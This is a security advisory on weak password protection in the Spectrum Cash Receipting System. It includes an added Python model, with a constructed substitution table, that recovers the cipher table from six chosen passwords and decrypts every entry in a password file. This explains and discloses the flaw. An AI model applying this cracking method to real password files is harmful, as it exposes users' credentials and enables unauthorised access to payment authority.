Security Advisory 05 – 002 – Spectrum Cash Receipting System Weak Password Protection Vulnerability
Spectrum Cash Receipting System
Vulnerability discovery and development:
Portcullis Security Testing Services
All known versions of Spectrum Cash Receipting System; the vulnerability was discovered in version 6.406.08.
The Spectrum Cash Receipting System is a client/server software solution that allows offline work, and therefore offline authentication. The application has several levels of authority with regard to authorising payments.
Local authentication requires the application's password file to reside locally.
Portcullis discovered that Spectrum's mechanism for protecting the passwords within the password file is a static substitution algorithm. Additional properties of the system reduce the available key space, expose plaintext in the ciphertext, enforce a maximum password length and reveal the length of each password in the password file.
Having the password file locally allows an attacker to enumerate valid users on the system and potentially gain unauthorised access through brute-force attempts on those users' passwords. Furthermore, valid users of the system could attempt privilege escalation, as they have full details of all valid user accounts.
When a password is created in the application, the algorithm converts all letters to lowercase and limits the length to a maximum of 6 characters. In the substitution stage it statically substitutes each alphanumeric character with a character from the range a-z or from the special characters "@+&()?\/", a set which also includes less than and greater than. Because the substitution is static, the same plaintext character always produces the same ciphertext character, so every known plaintext/ciphertext pair reveals part of the table. Any character in the password that is not alphanumeric is not substituted and is copied unchanged into the ciphertext.
If the password is shorter than 6 characters, the algorithm pads the ciphertext with whitespace to the full width, so the stored value also reveals the length of the password.
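The following model of the scheme is an added illustration; it is not Portcullis' proof-of-concept code and not Spectrum code. The substitution table in it is constructed for the example (the real table is not published here), and the sample password file is constructed as well. Everything else follows the advisory: lowercasing, truncation to 6 characters, a fixed substitution of alphanumerics, pass-through of other characters and space padding. It shows why a fixed table is fatal: an attacker who can set six chosen passwords recovers the whole table, after which every stored value in the file decrypts directly, and the padding gives away each password's length even without the table.

```python
"""Model of the password-protection scheme the advisory describes.

Added illustration, not Portcullis' proof-of-concept and not Spectrum code.
The substitution table is CONSTRUCTED; the real table is not published.
"""

MAX_LEN = 6

# The 36 possible input symbols after lowercasing.
ALNUM = "abcdefghijklmnopqrstuvwxyz0123456789"

# Constructed output alphabet: a-z plus the special characters the advisory
# lists, including '<' and '>'. That is also 36 symbols, so a fixed
# one-to-one table is possible; the permutation used here is arbitrary.
PERMUTED = r"q@w+r&e(t)y?u\i/o<p>asdfghjklzxcvbnm"
assert len(PERMUTED) == 36 and len(set(PERMUTED)) == 36

TABLE = dict(zip(ALNUM, PERMUTED))


def protect(password: str) -> str:
    """Stored form of a password under the described scheme."""
    pw = password.lower()[:MAX_LEN]
    # Non-alphanumerics are not substituted: they appear in the stored value.
    out = "".join(TABLE.get(ch, ch) for ch in pw)
    # Padding with spaces to the fixed width leaks the password length.
    return out.ljust(MAX_LEN)


def password_length(stored: str) -> int:
    """Length an attacker reads straight off the stored value.

    Only ambiguous if the password itself ended in spaces (copied through
    unchanged), in which case this is an upper bound.
    """
    return len(stored.rstrip(" "))


def recover_table(oracle) -> dict:
    """Rebuild the whole table from six chosen passwords.

    `oracle` stands for the ability to set a password and read back its
    stored form, e.g. an attacker creating test accounts. Six passwords of
    six alphanumerics each cover all 36 input symbols.
    """
    table = {}
    for i in range(0, len(ALNUM), MAX_LEN):
        chunk = ALNUM[i:i + MAX_LEN]
        stored = oracle(chunk)
        for plain, cipher in zip(chunk, stored):
            table[plain] = cipher
    return table


def unprotect(stored: str, table: dict) -> str:
    """Recover the (lowercased, truncated) plaintext from a stored value."""
    inverse = {cipher: plain for plain, cipher in table.items()}
    return "".join(inverse.get(ch, ch) for ch in stored.rstrip(" "))


def crack_file(entries: dict, table: dict) -> dict:
    """Plaintext for every account in a password file, given the table."""
    return {user: unprotect(stored, table) for user, stored in entries.items()}


if __name__ == "__main__":
    # Constructed sample password file: username -> stored value.
    sample_file = {
        "cashier1": protect("Pass1"),
        "super": protect("a!b"),
        "admin": protect("Pa$$w0rd"),
    }
    recovered = recover_table(protect)  # the application is the oracle
    assert recovered == TABLE
    for user, stored in sample_file.items():
        print(f"{user:10} stored={stored!r} length={password_length(stored)} "
              f"plaintext={unprotect(stored, recovered)!r}")
```

Note that `unprotect` returns what the application actually compared against, i.e. the lowercased, truncated form, which is all an attacker needs to log in; the original mixed-case input is irrelevant to the application.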
The impact of this vulnerability is that an attacker with local access to the password file can recover the plaintext passwords of all system users.
Portcullis has developed proof-of-concept code for this issue but, due to the sensitivity of the application, will not release it publicly.